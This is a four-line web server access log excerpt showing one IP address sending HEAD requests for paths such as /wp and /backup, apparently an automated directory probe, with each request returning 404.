69.167.12.38 - - [05/Jun/2023:01:14:18 +0200] "HEAD /wp HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
69.167.12.38 - - [05/Jun/2023:01:14:18 +0200] "HEAD /bc HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
69.167.12.38 - - [05/Jun/2023:01:14:19 +0200] "HEAD /bk HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
69.167.12.38 - - [05/Jun/2023:01:14:20 +0200] "HEAD /backup HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
